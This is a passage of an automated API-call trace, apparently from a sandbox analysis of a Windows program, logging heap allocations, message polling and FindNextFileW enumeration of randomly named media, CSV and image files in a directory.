cAlternateFileName="-U62PF~1.WAV")) returned 1 [0125.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0125.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e6a8 [0125.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7ece0 [0125.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0125.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0125.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ebb0 | out: hHeap=0x970000) returned 1 [0125.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9b8 | out: hHeap=0x970000) returned 1 [0125.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f160 | out: hHeap=0x970000) returned 1 [0125.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b90 | out: hHeap=0x970000) returned 1 [0125.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53cb0 [0125.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0125.384] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2e0 [0125.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2e0 | out: hHeap=0x970000) returned 1 [0125.384] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2e0 [0125.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2f0 [0125.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f160 [0125.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0125.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f160 | out: hHeap=0x970000) returned 1 [0125.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0125.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2f0 | out: hHeap=0x970000) returned 1 [0125.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2e0 | out: hHeap=0x970000) returned 1 [0125.384] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2e0 [0125.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0125.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2f0 [0125.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0125.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0125.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f160 [0125.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e980 [0125.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0125.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0125.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2f0 | out: hHeap=0x970000) returned 1 [0125.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2e0 | out: hHeap=0x970000) returned 1 [0125.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e980 | out: hHeap=0x970000) returned 1 [0125.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f160 | out: hHeap=0x970000) returned 1 [0125.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0125.391] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2e0 [0125.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2e0 | out: hHeap=0x970000) returned 1 [0125.391] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2e0 [0125.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0125.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0125.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2f0 [0125.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2f0 | out: hHeap=0x970000) returned 1 [0125.391] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28f960f0, ftCreationTime.dwHighDateTime=0x1d5e84f, ftLastAccessTime.dwLowDateTime=0x3785f910, ftLastAccessTime.dwHighDateTime=0x1d5ef40, ftLastWriteTime.dwLowDateTime=0x3785f910, ftLastWriteTime.dwHighDateTime=0x1d5ef40, nFileSizeHigh=0x0, nFileSizeLow=0x1651a, dwReserved0=0x0, dwReserved1=0x0, cFileName="2a44Hi4EE Lmnc.m4a", cAlternateFileName="2A44HI~1.M4A")) returned 1 [0125.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0125.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e980 [0125.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f2f0 [0125.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0125.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0125.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2e0 | out: hHeap=0x970000) returned 1 [0125.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e6a8 | out: hHeap=0x970000) returned 1 [0125.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ece0 | out: hHeap=0x970000) returned 1 [0125.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53cb0 | out: hHeap=0x970000) returned 1 [0125.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c80 [0125.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0125.392] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ec10 [0125.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ec10 | out: hHeap=0x970000) returned 1 [0125.392] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ec90 [0125.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ec80 [0125.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ecc0 [0125.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0125.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ecc0 | out: hHeap=0x970000) returned 1 [0125.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0125.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ec80 | out: hHeap=0x970000) returned 1 [0125.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ec90 | out: hHeap=0x970000) returned 1 [0125.392] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7eb90 [0125.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0125.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ec80 [0125.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0125.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0125.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7ed30 [0125.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e6a8 [0125.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0125.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0125.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ec80 | out: hHeap=0x970000) returned 1 [0125.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7eb90 | out: hHeap=0x970000) returned 1 [0125.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf0) returned 0x9782d8 [0125.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0125.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e6a8 | out: hHeap=0x970000) returned 1 [0125.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ed30 | out: hHeap=0x970000) returned 1 [0125.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0125.393] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ebd0 [0125.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ebd0 | out: hHeap=0x970000) returned 1 [0125.393] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ed20 [0125.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0125.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0125.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ec90 [0125.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ec90 | out: hHeap=0x970000) returned 1 [0125.393] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56751600, ftCreationTime.dwHighDateTime=0x1d5e2f0, ftLastAccessTime.dwLowDateTime=0xb3866f0, ftLastAccessTime.dwHighDateTime=0x1d5e86e, ftLastWriteTime.dwLowDateTime=0xb3866f0, ftLastWriteTime.dwHighDateTime=0x1d5e86e, nFileSizeHigh=0x0, nFileSizeLow=0x1309, dwReserved0=0x0, dwReserved1=0x0, cFileName="3cV5UrNf8.mp3", cAlternateFileName="3CV5UR~1.MP3")) returned 1 [0125.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0125.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0125.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7ec40 [0125.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0125.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0125.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ed20 | out: hHeap=0x970000) returned 1 [0125.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e980 | out: hHeap=0x970000) returned 1 [0125.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2f0 | out: hHeap=0x970000) returned 1 [0125.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c80 | out: hHeap=0x970000) returned 1 [0125.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c50 [0125.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0125.394] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2e0 [0125.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2e0 | out: hHeap=0x970000) returned 1 [0125.394] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2e0 [0125.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2f0 [0125.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f160 [0125.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0125.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f160 | out: hHeap=0x970000) returned 1 [0125.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0125.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2f0 | out: hHeap=0x970000) returned 1 [0125.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2e0 | out: hHeap=0x970000) returned 1 [0125.394] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f160 [0125.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0125.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2e0 [0125.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0125.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0125.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f2f0 [0125.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0125.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0125.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2e0 | out: hHeap=0x970000) returned 1 [0125.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f160 | out: hHeap=0x970000) returned 1 [0125.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0125.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2f0 | out: hHeap=0x970000) returned 1 [0125.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0125.475] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2e0 | out: hHeap=0x970000) returned 1 [0125.475] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2f0 | out: hHeap=0x970000) returned 1 [0125.475] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7cf2440, ftCreationTime.dwHighDateTime=0x1d5e0f3, ftLastAccessTime.dwLowDateTime=0x1551fec0, ftLastAccessTime.dwHighDateTime=0x1d5e1d0, ftLastWriteTime.dwLowDateTime=0x1551fec0, ftLastWriteTime.dwHighDateTime=0x1d5e1d0, nFileSizeHigh=0x0, nFileSizeLow=0x13fbd, dwReserved0=0x0, dwReserved1=0x0, cFileName="5_pKd716n7PnD.csv", cAlternateFileName="5_PKD7~1.CSV")) returned 1 [0125.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0125.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0125.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2e0 | out: hHeap=0x970000) returned 1 [0125.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0125.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ec40 | out: hHeap=0x970000) returned 1 [0125.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c50 | out: hHeap=0x970000) returned 1 [0125.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0125.475] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7eba0 | out: hHeap=0x970000) returned 1 [0125.476] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ecb0 | out: hHeap=0x970000) returned 1 [0125.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0125.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ed30 | out: hHeap=0x970000) returned 1 [0125.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ece0 | out: hHeap=0x970000) returned 1 [0125.476] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0125.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0125.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ece0 | out: hHeap=0x970000) returned 1 [0125.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ec50 | out: hHeap=0x970000) returned 1 [0125.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9f0 | out: hHeap=0x970000) returned 1 [0125.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ec10 | out: hHeap=0x970000) returned 1 [0125.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0125.476] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7eb80 | out: hHeap=0x970000) returned 1 [0125.476] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ec70 | out: hHeap=0x970000) returned 1 [0125.476] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd42cff4e, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xd42cff4e, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd4368900, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0x13800, dwReserved0=0x0, dwReserved1=0x0, cFileName="AES256Encrypt.256", cAlternateFileName="AES256~1.256")) returned 1 [0125.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0125.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0125.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ece0 | out: hHeap=0x970000) returned 1 [0125.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e980 | out: hHeap=0x970000) returned 1 [0125.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2f0 | out: hHeap=0x970000) returned 1 [0125.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53aa0 | out: hHeap=0x970000) returned 1 [0125.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0125.477] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f160 | out: hHeap=0x970000) returned 1 [0125.477] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f160 | out: hHeap=0x970000) returned 1 [0125.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0125.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2f0 | out: hHeap=0x970000) returned 1 [0125.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2e0 | out: hHeap=0x970000) returned 1 [0125.477] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0125.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0125.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2f0 | out: hHeap=0x970000) returned 1 [0125.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2e0 | out: hHeap=0x970000) returned 1 [0125.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e980 | out: hHeap=0x970000) returned 1 [0125.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f160 | out: hHeap=0x970000) returned 1 [0125.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0125.477] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2e0 | out: hHeap=0x970000) returned 1 [0125.477] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f160 | out: hHeap=0x970000) returned 1 [0125.477] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd80d70, ftCreationTime.dwHighDateTime=0x1d5ed23, ftLastAccessTime.dwLowDateTime=0xf9aa8940, ftLastAccessTime.dwHighDateTime=0x1d5ed4f, ftLastWriteTime.dwLowDateTime=0xf9aa8940, ftLastWriteTime.dwHighDateTime=0x1d5ed4f, nFileSizeHigh=0x0, nFileSizeLow=0x166f2, dwReserved0=0x0, dwReserved1=0x0, cFileName="alm7UiDYbRcNr.jpg", cAlternateFileName="ALM7UI~1.JPG")) returned 1 [0125.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0125.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0125.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f2e0 | out: hHeap=0x970000) returned 1 [0125.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9f0 | out: hHeap=0x970000) returned 1 [0125.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ec90 | out: hHeap=0x970000) returned 1 [0125.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c98 | out: hHeap=0x970000) returned 1 [0125.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0125.478] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7eba0 | out: hHeap=0x970000) returned 1 